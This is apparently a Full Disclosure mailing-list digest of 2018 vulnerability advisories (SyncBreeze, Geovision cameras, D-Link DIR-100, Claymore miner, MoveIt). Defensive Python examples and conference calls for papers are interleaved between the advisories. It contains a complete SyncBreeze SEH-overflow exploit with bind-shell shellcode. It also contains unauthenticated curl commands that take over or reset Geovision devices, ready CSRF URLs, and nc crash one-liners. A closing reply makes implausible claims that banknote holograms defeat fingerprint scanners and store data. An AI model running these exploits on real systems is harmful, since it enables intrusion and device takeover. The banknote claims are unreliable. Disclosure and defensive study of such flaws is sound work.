[FD] IPSwitch MoveIt Stored Cross Site Scripting (XSS)

2018-02-02 Thread 1n3
# Exploit Title: IPSwitch MoveIt Stored Cross Site Scripting (XSS)
# Date: 1-31-2017
# Software Link: https://www.ipswitch.com/moveit
# Affected Version: 8.1-9.4 (only confirmed on 8.1 but other versions prior to 9.5 may also be vulnerable)
# Exploit Author: 1N3@CrowdShield - https://crowdshield.com (Early Warning Security)
# Contact: https://twitter.com/crowdshield
# Vendor Homepage: https://www.ipswitch.com 
# Category: Webapps
# Attack Type: Remote
# Impact: Data/Cookie Theft 
1. Description
==
IPSwitch MoveIt v8.1 is vulnerable to a Stored Cross-Site Scripting
(XSS) vulnerability. Attackers can leverage this vulnerability to send
malicious messages to other users in order to steal session cookies
and launch client-side attacks. 
2. Proof of Concept
==
The vulnerability lies in the Send Message -> Body Text Area input
field.
POST /human.aspx?r=692492538 HTTP/1.1
Host: host.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: https://host.com/human.aspx?r=510324925
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 598

czf=9c9e7b2a9c9e7b2a9c9e7b2a9c9e7b2a9c066e4aee81bf97f581826d8c093953d82d2b692be5490ece13e6b23f1ad09bda751db1444981eb029d2427175f9906&server=host.com&url=%2Fhuman.aspx&instid=2784&customwizlogoenabled=0&customwiznameup=&customwizzipnameup=%5Bdefault%5D&transaction=secmsgpost&csrftoken=1a9cc0f7aa7ee2d9e0059d6b01da48b69a14669d&curuser=kuxt36r50uhg0sXX&arg12=secmsgcompose&Arg02=&Arg03=452565093&Arg05=edit&Arg07=forward&Arg09=&Arg10=&opt06=&Opt08=&opt01=username&opt02=&opt03=&arg01=FW%3A+test&Opt12=1&arg04=&attachment=&opt07=1&arg05_Send=Send
3. Solution
==
Update to version 9.5
4. Disclosure Timeline
==
1/30/2017 - Disclosed details of vulnerability to IPSwitch.
1/31/2017 - IPSwitch confirmed the vulnerability and verified the fix
as of version 9.5 and approved public disclosure of the vulnerability.
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
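The advisory above reports that a message body is stored and later shown to the recipient without output encoding. The following is an added example, not code from the advisory or from MoveIt: it renders a constructed body with and without context-aware HTML escaping and uses Python's own HTML parser to show which elements each rendering would actually create in the recipient's browser. The template, the element names and the sample body are assumptions of this example.

```python
"""Added example, not from the advisory or from MoveIt itself: rendering a
stored message body with and without HTML output encoding, and checking
with a real HTML parser which elements each rendering would create."""
import html
from html.parser import HTMLParser

# Constructed sample: what a sender could type into the message body field.
# alert(1) is the usual harmless marker used to demonstrate script execution.
CONSTRUCTED_BODY = "Hi <b>there</b> <script>alert(1)</script>"

# Tags that belong to the template; anything else the parser sees came from the body.
TEMPLATE_TAGS = {"div"}


def render_message_unsafe(body: str) -> str:
    """The bug class: the stored body is interpolated verbatim into the page,
    once in an attribute context and once in the element body."""
    return f'<div class="msg" title="{body}">{body}</div>'


def render_message_safe(body: str) -> str:
    """Encodes the body for each context it lands in. html.escape(quote=True)
    also encodes quotes, which is required inside an attribute value; the
    element body only needs &, < and > encoded."""
    attr = html.escape(body, quote=True)
    text = html.escape(body, quote=False)
    return f'<div class="msg" title="{attr}">{text}</div>'


class _Collector(HTMLParser):
    """Records the start tags and the visible text the parser produces."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: list[str] = []
        self.text: list[str] = []

    def handle_starttag(self, tag: str, attrs) -> None:
        self.tags.append(tag)

    def handle_data(self, data: str) -> None:
        self.text.append(data)


def _parse(rendered: str) -> _Collector:
    collector = _Collector()
    collector.feed(rendered)
    collector.close()
    return collector


def injected_elements(rendered: str) -> list[str]:
    """Elements in the rendered fragment that did not come from the template."""
    return [t for t in _parse(rendered).tags if t not in TEMPLATE_TAGS]


def visible_text(rendered: str) -> str:
    """The text a reader would see, with character references decoded."""
    return "".join(_parse(rendered).text)


if __name__ == "__main__":
    print(injected_elements(render_message_unsafe(CONSTRUCTED_BODY)))  # ['b', 'script']
    print(injected_elements(render_message_safe(CONSTRUCTED_BODY)))    # []
    print(visible_text(render_message_safe(CONSTRUCTED_BODY)))
```

The hardened rendering keeps the body readable (the parser decodes the entities back to the original characters) while creating no element the sender controls; escaping once per context is the point, since a body that is safe in element text is still not safe inside an attribute value unless quotes are encoded too.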

[FD] Recon Montreal 2018 Call For Papers - 0xE - Registration - Training - Conference - Submit! - PGP key

2018-02-02 Thread cfpmontreal2018
- RECON MONTREAL 2018 -

0xE - CFP - Training Registration - Conference - Submit! - PGP key

[ASCII-art banner: https://recon.cx/2018/montreal - June 15 - 16 - 17, 2018 - Montreal]

#   C F P  #

We are now inviting speakers to submit proposals
for Recon Montreal 2018.

Some guidelines for talks are:

 - 30 or 60 minute presentations

 - We are open to proposals for workshops that would occur alongside
   talks

 - There will be time for five to ten minute informal lightning talks
   during the REcon party
   

[FD] Claymore Dual Gpu Miner <= 10.5 Format Strings Vulnerability

2018-02-02 Thread disclosure


Claymore Dual Gpu Miner <= 10.5 Format Strings Vulnerability
===

product: Claymore's Dual Miner
vulnerable version: <= 10.5
fixed version: 10.6
CVE number: CVE-2018-6317
impact: critical
homepage: https://bitcointalk.org/index.php?topic=1433925.0
found: 2018-01-26
by: twitter.com/res1n

===


Vulnerability overview/description:
---
Claymore’s Dual GPU Miner 10.5 and below is vulnerable to a format 
strings vulnerability. This allows an unauthenticated remote attacker to 
read memory addresses, or immediately terminate the mining process 
causing a denial of service.


1) By sending a custom request to the json api on port  of the 
remote management service it's possible to leak stack addresses and 
possibly rewrite stack addresses with %p.  I wasn't able to break out of 
the json padding but someone else may be able to as %s also dumps string 
contents.


example - echo -e '{"id":1,"jsonrpc":"1.0","method":"%x %x %x %x"}' | nc 192.168.1.139  & printf "\n".


2) Sending %n to the json api on port  immediately kills the mining 
process.


example - echo -e '{"id":1,"jsonrpc":"1.0","method":"%n"}' | nc 192.168.1.139  & printf "\n".


Solution

Upgrade to version 10.6


Vendor contact timeline:

01/26/18 — Reported to dev
01/26/18 — Confirmed and immediately patched. 10.6 released, request for 3–4 day embargo

01/31/18 — Public Disclosure

Writeup - 
https://medium.com/secjuice/claymore-dual-gpu-miner-10-5-format-strings-vulnerability-916ab3d2db30



[FD] CFP: EuroSec 2018, 11th European Workshop on Systems Security (Extended Deadline: February 9, 2018)

2018-02-02 Thread Fengwei Zhang
# Call for Papers: EuroSec 2018

11th European Workshop on Systems Security
Porto, Portugal - April 23, 2018

 - Web: http://www.sharcs-project.eu/eurosec-2018/
 - Twitter: @EuroSecWorkshop
 - Hashtag: #eurosec2018

## Important Dates

 - Extended paper submission deadline: *February 9, 2018 (AoE)*
 - Acceptance notification: March 2, 2018
 - Final paper due: March 8, 2018
 - Workshop: April 23, 2018

## About EuroSec

The 11th European Workshop on Systems Security (EuroSec) aims to bring
together researchers, practitioners, system administrators, system
programmers, and others interested in the latest advances in the
security of computer systems and networks. The objective of the
workshop is to discuss novel, practical, systems-oriented work. The
workshop will precede the EuroSys 2018 conference.

## Our Aim

EuroSec encourages systems security researchers to share early
iterations of bleeding-edge ideas with the community, before they are
further developed into full papers. Reciprocally, authors receive
feedback to help steer and improve their research to its full
potential. Many EuroSec papers later form the basis for full
conference papers presented at one of the top venues in computer
security.

## Topics of Interest

EuroSec seeks contributions on all aspects of systems security. Topics
of interest include (but are not limited to):

 - New attacks, evasion techniques, and defenses
 - Operating system security
 - Mobile systems security
 - Malicious code analysis and detection
 - Web security
 - Network security
 - Reverse engineering and binary analysis
 - Hardware security
 - Virtual machines and hypervisors
 - Trusted computing and its applications
 - System security aspects of privacy
 - Identity management and anonymity
 - Systems-based forensics
 - Vulnerability discovery, analysis, and exploitation
 - Embedded system security
 - Cybercrime ecosystem and economics
 - Security of critical infrastructures

In accordance with the spirit of EuroSys, we also seek:

 - Quantified or insightful experience with existing systems
 - Reproduction or refutation of previous results
 - Negative results and early ideas

## Paper Submissions

You are invited to submit papers of up to 6 pages, with 9-point font,
in a two-column format, including figures, tables and references.
Submitted papers must use the ACM sig-alternate-05-2015 LaTeX
template. You should not modify key aspects of the template, such as
font face, spacing, etc. The template, as well as instructions on how
to use it, can be found here.

All submissions will be reviewed by the Program Committee. Only
original, novel work will be considered for publication. Accepted
papers will be published in the Proceedings of EuroSec in the ACM
Digital Library.

Submissions should be made online at

 - http://eurosec2018.sec.cs.tu-bs.de

## Committee

### Program Chairs

 - Angelos Stavrou, George Mason University
 - Konrad Rieck, TU Braunschweig

### Program Committee

 - Magnus Almgren, Chalmers University of Technology
 - Manos Antonakakis, Georgia Institute of Technology
 - Elias Athanasopoulos, University of Cyprus
 - Foteini Baldimtsi, George Mason University
 - Leyla Bilge, Symantec Research Labs
 - Lorenzo Cavallaro, Royal Holloway, University of London
 - Brendan Dolan-Gavitt, New York University
 - Yanick Fratantonio, Eurecom
 - Alexandros Kapravelos, NC State University
 - Vasileios Kemerlis, Brown University
 - Anil Kurmus, IBM Research - Zurich
 - Andrea Lanzi, University of Milan
 - Martina Lindorfer, UC Santa Barbara
 - Federico Maggi, Trend Micro
 - Collin Mulliner, 3BLabs
 - Mathias Payer, Purdue University
 - Jason Polakis, University of Illinois at Chicago
 - Christian Rossow, Saarland University
 - Gianluca Stringhini, University College London
 - Giorgos Vasiliadis, FORTH
 - Fengwei Zhang, Wayne State University

### Steering Committee

 - Herbert Bos, VU Amsterdam
 - Evangelos Markatos, FORTH and University of Crete
 - Sotiris Ioannidis, FORTH

### Publicity Chairs

 - Fengwei Zhang, Wayne State University
 - Christian Wressnegger, TU Braunschweig

### Web Chair

 - Antonis Krithinakis, FORTH



[FD] Geovision Inc. IP Camera/Video/Access Control Multiple Remote Command Execution - Multiple Stack Overflow - Double free - Unauthorized Access

2018-02-02 Thread bashis
[STX]

Subject: Geovision Inc. IP Camera/Video/Access Control Multiple Remote Command 
Execution - Multiple Stack Overflow - Double free - Unauthorized Access

Attack vector: Remote
Authentication: Anonymous (no credentials needed)
Researcher: bashis  (November 2017)
PoC: https://github.com/mcw0/PoC
Python PoC: https://github.com/mcw0/PoC/blob/master/Geovision-PoC.py
Release date: February 1, 2018
Full Disclosure: 90 days

Vendor URL: http://www.geovision.com.tw/
Updated FW: http://www.geovision.com.tw/download/product/

heap: Executable + Non-ASLR
stack: Executable + ASLR

Vulnerable:
Practically more or less all models and versions with FW before 
November/December 2017 of Geovision embedded IP devices suffer from one or more 
of these vulnerabilities.

Verified:
GV-BX1500 v3.10 2016-12-02
GV-MFD1501 v3.12 2017-06-19

Timeline:
November 5, 2017: Initiated contact with Geovision
November 6, 2017: Response from Geovision
November 8, 2017: Informed Geovision about a quite dangerous bug in 
'FilterSetting.cgi'
November 8, 2017: Response from Geovision
November 15, 2017: Reached out to Geovision to offer more time until FD
   (due to the ease of exploitation and the number of vulnerabilities in a 
large number of products)
November 17, 2017: Request from Geovision to have time to end of January 2018
November 18, 2017: Agreed to FD date of February 1, 2018
November 20, 2017: Received one image for test purposes
November 26, 2017: ACK to Geovision that image looks good
January 16, 2018: Sent this FD and PoC Python to Geovision for comments before 
FD, if any objections.
January 17, 2018: Received all OK from Geovision, no objections, together with 
thanks for the effort of trying to make Geovision products safer.
January 17, 2018: Thanked Geovision for good cooperation.
February 1, 2018: Full disclosure


-[Unauthorized Access]-

1)
PoC: Reset and change 'admin' to 'root' with passwd 'PWN' (GV-MFD1501 v3.12 
2017-06-19)
curl -v http://192.168.57.20:80/UserCreat.cgi?admin_username=root\&admin_passwordNew=PWN

2)
PoC: Change device WebGUI language back to default
curl -v -X POST http://192.168.57.20:80/LangSetting.cgi -d lang_type=0\&submit=Apply

3)
Unauthorized upgrade of firmware.
PoC: Reboot the remote device as in 'run_upgrade_prepare'
curl -v "http://192.168.57.20:80/geo-cgi/sdk_fw_update.cgi"
URI: http://192.168.57.20/ssi.cgi/FirmwareUpdate.htm

4)
PoC: Upload of Firmware header for checking correct firmware.
curl -v -X PUT "http://192.168.57.20:80/geo-cgi/sdk_fw_check.cgi" -d "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"

/var/log/messages
192.168.57.1 - - [01/Jan/1970:00:32:43 +] "PUT /geo-cgi/sdk_fw_check.cgi HTTP/1.1" 200 25000 "" "curl/7.38.0"
Nov  5 17:11:51 thttpd[1576]: (1576) cgi[3734]: Spawned CGI process 1802 to run 'geo-cgi/sdk_fw_check.cgi', query[]
Nov  5 17:11:51 sdk_fw_check.cgi: CONTENT_LENGTH = 684
Nov  5 17:11:51 sdk_fw_check.cgi: (1802) main[183]: base64 encode length : 684
Nov  5 17:11:51 sdk_fw_check.cgi: (1802) main[184]: base64 encode output : BLABAgAAADKvfBIBGDIpBwBhc19jcmZpZAAALgYAALDXe///AABib290bG9hZGVyLmJpbgA0ALAAAgBOAP//AAB1SW1hZ2UA1OIaALAANgDSw///AAByYW1kaXNrLmd6ALBtArAAUgAIuf//AAAjIFN0YXJpbmcgd2l0aCAnSElEOicgYW5kIHNwbGl0IGJ5ICcsJyBhbmQgZW5kIHdpdGggJ1xyXG4nICgweDBkIDB4MGEpDQpISUQ6MTE3MCxOYW1lOkdWLUxQQzIyMTAsRG93blZlcjoxMDINCkhJRDoxMTUwLE5hbWU6R1YtUFBUWjczMDBfU0QsRG93blZlcjozMDUNCkhJRDoxMTUyLE5hbWU6R1YtUFBUWjczMDBfRkUsRG93blZlcjoz
Nov  5 17:11:51 sdk_fw_check.cgi: (1802) main[185]: decode length: 512
Nov  5 17:11:51 sdk_fw_check.cgi: (1802) main[186]: decode output: ^D
Nov  5 17:11:51 sdk_fw_check.cgi: (1802) check_image_format_is_OK[839]: (1) Product Error: Image's magic[513] != DEV_MAGIC[1000]
Nov  5 17:11:51 sdk_fw_check.cgi: (1802) check_firmware[135]: ERROR : check firmware, length [512]

5)
Unauthorized access of 'sdk_config_set.cgi' to Import Setting (SDK_CONFIG_SET) 
curl -v -X PUT "http://192.168.57.20:80/geo-cgi/sdk_config_set.cgi"

6)
/PSIA/
Access to GET (read) and PUT (write)
curl -v -X PUT http://192.168.57.20:80/PSIA/System/reboot
curl -v -X PUT http://192.168.57.20:80/PSIA/System/updateFirmware
curl -v -X PUT http://192.168.57.20:80/PSIA/System/factoryReset
[...]
List: /PSIA/System/reboot/index
Usage: /PSIA/S
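The advisory above quotes an access-log line from the device's /var/log/messages alongside the CGI endpoints it reached without credentials. The following is an added example, not from the advisory or from Geovision firmware: an audit over log lines in that shape which flags successful requests to those endpoints that carry no authenticated user, so an operator can spot the activity in retained logs. The sample lines are constructed after the advisory's excerpt; that the device records the authenticated user in the third field (as the common log format does) is an assumption of this example.

```python
"""Added example, not from the advisory or from Geovision firmware: an audit
over access-log lines in the format the advisory quotes, flagging successful
unauthenticated requests to the CGI endpoints the advisory lists."""
import re
from dataclasses import dataclass
from typing import Optional

# Common-log-format request line; the user field is assumed to hold "-" when
# no credentials were presented.
LOG_LINE = re.compile(
    r'^(?P<src>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: HTTP/[\d.]+)?" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
    r'(?: "(?P<referer>[^"]*)" "(?P<agent>[^"]*)")?'
)

# Endpoints named in the advisory as reachable without credentials.
SENSITIVE_PATHS = [
    re.compile(r"^/UserCreat\.cgi$"),
    re.compile(r"^/LangSetting\.cgi$"),
    re.compile(r"^/geo-cgi/sdk_\w+\.cgi$"),
    re.compile(r"^/PSIA/System/(?:reboot|updateFirmware|factoryReset)$"),
]


@dataclass(frozen=True)
class Finding:
    src: str
    method: str
    path: str
    status: int


def parse_log_line(line: str) -> Optional[dict]:
    """Splits one access-log line into fields; None if it is not a request line
    (the CGI's own syslog output is interleaved in the same file)."""
    m = LOG_LINE.match(line.strip())
    return m.groupdict() if m else None


def is_sensitive(path: str) -> bool:
    return any(p.match(path) for p in SENSITIVE_PATHS)


def audit(lines: list[str]) -> list[Finding]:
    """Findings for sensitive endpoints that answered 2xx to a request with no
    authenticated user. Denied requests (4xx) and authenticated ones are skipped."""
    findings = []
    for line in lines:
        rec = parse_log_line(line)
        if rec is None:
            continue
        path = rec["target"].split("?", 1)[0]   # drop the query string
        status = int(rec["status"])
        if rec["user"] == "-" and 200 <= status < 300 and is_sensitive(path):
            findings.append(Finding(rec["src"], rec["method"], path, status))
    return findings


# Constructed sample lines modelled on the advisory's log excerpt.
CONSTRUCTED_LOG = [
    '192.168.57.1 - - [05/Nov/2017:17:11:51 +0000] "PUT /geo-cgi/sdk_fw_check.cgi HTTP/1.1" 200 25000 "" "curl/7.38.0"',
    'Nov  5 17:11:51 thttpd[1576]: (1576) cgi[3734]: Spawned CGI process 1802',
    '192.168.57.1 - - [05/Nov/2017:17:12:03 +0000] "GET /UserCreat.cgi?admin_username=root&admin_passwordNew=REDACTED HTTP/1.1" 200 118 "" "curl/7.38.0"',
    '192.168.57.1 - - [05/Nov/2017:17:12:10 +0000] "GET /ssi.cgi/FirmwareUpdate.htm HTTP/1.1" 200 4311 "" "Mozilla/5.0"',
    '192.168.57.1 - admin [05/Nov/2017:17:12:30 +0000] "PUT /PSIA/System/reboot HTTP/1.1" 200 0 "" "curl/7.38.0"',
    '192.168.57.1 - - [05/Nov/2017:17:12:41 +0000] "PUT /PSIA/System/factoryReset HTTP/1.1" 401 0 "" "curl/7.38.0"',
]

if __name__ == "__main__":
    for finding in audit(CONSTRUCTED_LOG):
        print(finding)
```

The two flagged lines are the firmware-header upload and the account change; the reboot is skipped because a user was authenticated, and the factory reset because the device refused it. After the vendor firmware from the advisory is applied, the same audit run against fresh logs should produce no findings, which is a cheap way to confirm the fix took effect.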

[FD] New vulnerabilities in D-Link DIR-100

2018-02-02 Thread MustLive

Hello list!

There are Cross-Site Request Forgery and URL Redirector Abuse
vulnerabilities in D-Link DIR-100. This is my second advisory for DIR-100.

-
Affected products:
-

The following model is vulnerable: D-Link DIR-100, Firmware v1.01. All other
versions must also be vulnerable.

--
Details:
--

Cross-Site Request Forgery (WASC-09):

Change admin's password:

http://site/Tools/tools_admin.xgi?SET/sys/account/superUserName=admin&SET/sys/account/superUserPassword=admin

Turn on Remote Management:

http://site/Tools/tools_admin.xgi?SET/security/firewall/httpAllow=1&SET/security/firewall/httpRemotePort=80

CSRF attack to change admin's password and turn on Remote Management:

http://site/Tools/tools_admin.xgi?SET/sys/account/superUserName=admin&SET/sys/account/superUserPassword=admin&SET/security/firewall/httpAllow=1&SET/security/firewall/httpRemotePort=80

URL Redirector Abuse (WASC-38):

http://site/Tools/vs.htm?location=http://www.google.com

This is a persistent redirector attack. After an address is set in the location
parameter it is saved, and later it is possible to redirect just by visiting
the page http://site/Tools/vs.htm.

I mentioned these vulnerabilities on my site
(http://websecurity.com.ua/8021/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua 



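The post above describes two missing server-side checks: settings are applied from a GET request with no proof that the admin intended it, and the location parameter of Tools/vs.htm is stored and followed unvalidated. The following is an added example, not from the post or from D-Link firmware, showing both checks as they would be written in a web handler: a CSRF check for state-changing requests and a validator for the redirect target. The SET/... parameter names and the vs.htm path come from the post; the admin host, the request model and the session-token handling are assumptions of this example.

```python
"""Added example, not from the advisory or from D-Link firmware: a CSRF check
for state-changing requests and a redirect-target validator, the two checks
whose absence the advisory describes."""
import hmac
from typing import Optional
from urllib.parse import parse_qs, urlsplit

# Host under which the admin interface is served (assumed for the example).
ADMIN_HOST = "192.168.0.1"


def is_state_change(method: str, query: str) -> bool:
    """The DIR-100 applies settings from 'SET/...' query keys, so any request
    carrying one is state-changing whatever the HTTP method; so is any POST."""
    keys = parse_qs(query, keep_blank_values=True).keys()
    return method.upper() == "POST" or any(k.startswith("SET/") for k in keys)


def csrf_check(method: str, url: str, headers: dict, form_token: Optional[str],
               session_token: str) -> tuple:
    """Accepts a state-changing request only if it is a POST, comes from the
    admin origin, and carries the per-session token. Returns (ok, reason)."""
    parts = urlsplit(url)
    if not is_state_change(method, parts.query):
        return True, "read-only request"
    if method.upper() != "POST":
        return False, "state change via GET"
    origin = headers.get("Origin") or headers.get("Referer")
    if origin is None:
        return False, "no Origin or Referer header"
    if urlsplit(origin).hostname != ADMIN_HOST:
        return False, "cross-origin request"
    # Constant-time comparison so the token cannot be guessed byte by byte.
    if form_token is None or not hmac.compare_digest(form_token, session_token):
        return False, "missing or wrong CSRF token"
    return True, "ok"


def safe_redirect_target(location: Optional[str], default: str = "/") -> str:
    """Only a local absolute path is accepted as a redirect target; anything
    with a scheme, an authority ('//'), a backslash or a control character
    falls back to the default, so a stored value cannot send users elsewhere."""
    if not location:
        return default
    if not location.startswith("/") or location.startswith("//"):
        return default
    if "\\" in location or any(ord(c) < 0x20 for c in location):
        return default
    parts = urlsplit(location)
    if parts.scheme or parts.netloc:
        return default
    return location


# Constructed request using the parameter names from the advisory.
CSRF_URL = ("http://192.168.0.1/Tools/tools_admin.xgi?"
            "SET/sys/account/superUserName=admin&SET/sys/account/superUserPassword=admin")

if __name__ == "__main__":
    session = "c0ffee"   # constructed session token
    print(csrf_check("GET", CSRF_URL, {}, None, session))
    print(csrf_check("POST", CSRF_URL, {"Origin": "http://other.example"}, session, session))
    print(csrf_check("POST", CSRF_URL, {"Origin": "http://192.168.0.1"}, session, session))
    print(safe_redirect_target("http://www.google.com"), safe_redirect_target("/Tools/vs.htm"))
```

The GET form of the attack fails the first check outright, a cross-site POST fails the origin check even if the browser sends cookies along, and a forged form that somehow has the right origin still needs the session token it cannot read. The redirect validator rejects external URLs and protocol-relative "//host" forms, so even a stored location value can only point inside the device's own interface.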


[FD] Flexense SyncBreeze Entreprise 10.3.14 Buffer Overflow (SEH-bypass)

2018-02-02 Thread RYT
Hi List,

Description:

A buffer overflow vulnerability in "Add command" functionality exists in 
Flexense’s SyncBreeze Enterprise <= 10.3.14. The vulnerability can be triggered 
by an authenticated attacker who submits more than 5000 characters as the 
command name. It will cause termination of the SyncBreeze Enterprise server and 
possibly remote command execution with SYSTEM privilege.

Author:

@ryantzj

www.ryantzj.com

Homepage:

http://www.syncbreeze.com/

CVE-ID:

CVE-2017-17996 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17996

CVSSv3 Score:

9.9

CVSSv3 Vector

(/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H)

Proof of Concept

#!/usr/bin/python

import socket


buffsize = 5000

#msfvenom -p windows/shell_bind_tcp LPORT=443 EXITFUNC=seh --bad-chars '\x0d\x0a\x00\x27\x22\x08\x09\x1b\x5c\x5f\x25\x26\x3d\x2b' -f python -v shellcode
shellcode =  ""
shellcode += "\x33\xc9\x83\xe9\xae\xe8\xff\xff\xff\xff\xc0\x5e"
shellcode += "\x81\x76\x0e\x93\xfe\x85\x99\x83\xee\xfc\xe2\xf4"
shellcode += "\x6f\x16\x07\x99\x93\xfe\xe5\x10\x76\xcf\x45\xfd"
shellcode += "\x18\xae\xb5\x12\xc1\xf2\x0e\xcb\x87\x75\xf7\xb1"
shellcode += "\x9c\x49\xcf\xbf\xa2\x01\x29\xa5\xf2\x82\x87\xb5"
shellcode += "\xb3\x3f\x4a\x94\x92\x39\x67\x6b\xc1\xa9\x0e\xcb"
shellcode += "\x83\x75\xcf\xa5\x18\xb2\x94\xe1\x70\xb6\x84\x48"
shellcode += "\xc2\x75\xdc\xb9\x92\x2d\x0e\xd0\x8b\x1d\xbf\xd0"
shellcode += "\x18\xca\x0e\x98\x45\xcf\x7a\x35\x52\x31\x88\x98"
shellcode += "\x54\xc6\x65\xec\x65\xfd\xf8\x61\xa8\x83\xa1\xec"
shellcode += "\x77\xa6\x0e\xc1\xb7\xff\x56\xff\x18\xf2\xce\x12"
shellcode += "\xcb\xe2\x84\x4a\x18\xfa\x0e\x98\x43\x77\xc1\xbd"
shellcode += "\xb7\xa5\xde\xf8\xca\xa4\xd4\x66\x73\xa1\xda\xc3"
shellcode += "\x18\xec\x6e\x14\xce\x96\xb6\xab\x93\xfe\xed\xee"
shellcode += "\xe0\xcc\xda\xcd\xfb\xb2\xf2\xbf\x94\x01\x50\x21"
shellcode += "\x03\xff\x85\x99\xba\x3a\xd1\xc9\xfb\xd7\x05\xf2"
shellcode += "\x93\x01\x50\xf3\x9b\xa7\xd5\x7b\x6e\xbe\xd5\xd9"
shellcode += "\xc3\x96\x6f\x96\x4c\x1e\x7a\x4c\x04\x96\x87\x99"
shellcode += "\x92\x45\x0c\x7f\xf9\xee\xd3\xce\xfb\x3c\x5e\xae"
shellcode += "\xf4\x01\x50\xce\xfb\x49\x6c\xa1\x6c\x01\x50\xce"
shellcode += "\xfb\x8a\x69\xa2\x72\x01\x50\xce\x04\x96\xf0\xf7"
shellcode += "\xde\x9f\x7a\x4c\xfb\x9d\xe8\xfd\x93\x77\x66\xce"
shellcode += "\xc4\xa9\xb4\x6f\xf9\xec\xdc\xcf\x71\x03\xe3\x5e"
shellcode += "\xd7\xda\xb9\x98\x92\x73\xc1\xbd\x83\x38\x85\xdd"
shellcode += "\xc7\xae\xd3\xcf\xc5\xb8\xd3\xd7\xc5\xa8\xd6\xcf"
shellcode += "\xfb\x87\x49\xa6\x15\x01\x50\x10\x73\xb0\xd3\xdf"
shellcode += "\x6c\xce\xed\x91\x14\xe3\xe5\x66\x46\x45\x7b\x97"
shellcode += "\xa1\x14\xed\x3f\x06\x43\x18\x66\x46\xc2\x83\xe5"
shellcode += "\x99\x7e\x7e\x79\xe6\xfb\x3e\xde\x80\x8c\xea\xf3"
shellcode += "\x93\xad\x7a\x4c"


jmp2 = "\xE9\x42\xFE\xFF\xFF"


payload = "A"*(432-len(shellcode)-20) #eip offset at 436
payload += "\x90"*12
payload += shellcode
payload += "\x90"*8
payload += "\x71\x06\x70\x04" #NSEH, a jump net
payload += "\xB1\x41\x01\x10" #SEH
payload += "\x90"
payload += jmp2 #jmp back to shellcode
payload += "C"*(buffsize) #ends at 83 bytes

buffer ="POST /add_command?sid=c5ecca3e01e7d15b0a490fc197f14395 HTTP/1.1\r\n"
buffer +="Host: 192.168.38.154\r\n"
buffer +="Content-Type: application/x-www-form-urlencoded\r\n"
buffer +="User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_03\r\n"
buffer +="Content-Length: "+str(len(payload)+13)+"\r\n\r\n"
buffer +="command_name="+payload

print "[*] Sending evil HTTP request to syncbrz"
print "[*] exploited by @ryantzj"
print "[*] Please modify session id and target host to get exploit working"

expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect(("192.168.38.154",80))
expl.send(buffer)
print expl.recv(1024)
expl.close()


Disclosure Timeline

1. December 29, 2017: Vulnerability acquired by ryantzj

2. December 30, 2017: Informed vendor via supp...@syncbreeze.com

3. January 31, 2018: Exploit published


Regards,

ryantzj


Re: [FD] Banknotes Misproduction security & biometric weakness

2018-02-02 Thread Ben Tasker
There's some detail in the Vulnerability magazine link, reproducing here so
there's a record

We discovered an anomaly in the hologram section of the new printed 20€ &
50€ banknotes. The security sign on the banknotes is produced with a
transparent film. In the middle of the new hologram of the 20 & 50€
banknotes is a picture of a woman and different fingerprint-like
structures. At the moment we noted the problem, we used a microscope to
look closer.

After an internal discussion that the security sign could maybe be used for
biometric authentication processes, we tested the hologram for usage on
different fingerprint scanners like the Asus Pro laptop, Eikon, Samsung
Galaxy S7/8 and the Apple iPhone v11. All mechanisms could be bypassed
using the hologram of the banknotes to fake a fingerprint which is accepted
by the fingerprint-scanner system. After that, the attacker is able to
relogin with the universal hologram.

Finally, we were able to bypass the biometric identification process of
the different devices. No system is able to identify that the hologram is
not a real fingerprint. At the end, we figured out in the testing process
that the holograms can be used to add via write and auth via read. There
are now multiple problems in connection to the security issue.
1. Fingerprint - Reader & Writer (Mobile Devices)

The end user devices like phones with fingerprint sensors of
manufacturers like Samsung, Apple, Huawei & co are permanently vulnerable
to this new type of attack. The sensor does not approve the reflection of
the hologram in the read and write mode. It interprets the security signs
as features of a real fingerprint. This results in an easy bypass using any
20€ or 50€ banknote after registration. An attacker only requires
to use his finger behind the hologram to bypass the finger-pulse check of
the iDevice. All other mechanisms are not accurate in approving the content
during the sensor check.

2. Biometric Security in Europe
Each time the EZB produces more of the affected banknotes, the biometric
security in all European countries is generally weakened. In the near
future the EZB plans to integrate the holograms into any banknote (5€, 10€,
100€ & co.). This would be a crazy incident for all biometric systems using
a fingertip to authenticate, because any person is now able to perform
this type of attack against an environment or service.

3. Fake fingerprints to go
Any person that has access to a system could use a hologram of a European
banknote to fake his fingerprint. Even the ones who do not have the
expertise to fake it, because in case of a publication the government would
have to reckon with it.

4. Universal fingerprint as key
Once a hologram is written to a database, any attacker could use
another hologram of the same banknote series to bypass the security
mechanism to finally get access to the environment. Also administrators or
moderators are able to set up a universal fingerprint key to any DBMS for
further entrance.

5. Save content in biometric signs or read data
The problematic could be used by security agencies to save data in the
biometric sign or to use them to get access to protected environments. An
agent could for example save data variables in the biometric sign of the
banknote to exfiltrate information.

6. Information in the hologram
In the special case that a fingerprint entry is generated by mathematical
variables with plain information, the content can be saved as plain-text
information to extract the binary information. The binary information of
the hologram fingerprint can then be deciphered by using different unknown
one-time pad keys. So the data of the fingerprint is translated to binary
code with a fingerprint device (open source) in plain-text. The plain-text
is then used to identify the cipher inside the security sign hologram.
7. Save your Privacy

At that point people can as well use the hologram to authenticate to a
system or to a mobile device, in case a user does not want to save his
personal fingerprint to any untrusted device. They can now use the
hologram to save a fingerprint and authenticate in a fully anonymous way.
8. Bypassing the biometric security with the help of banknotes

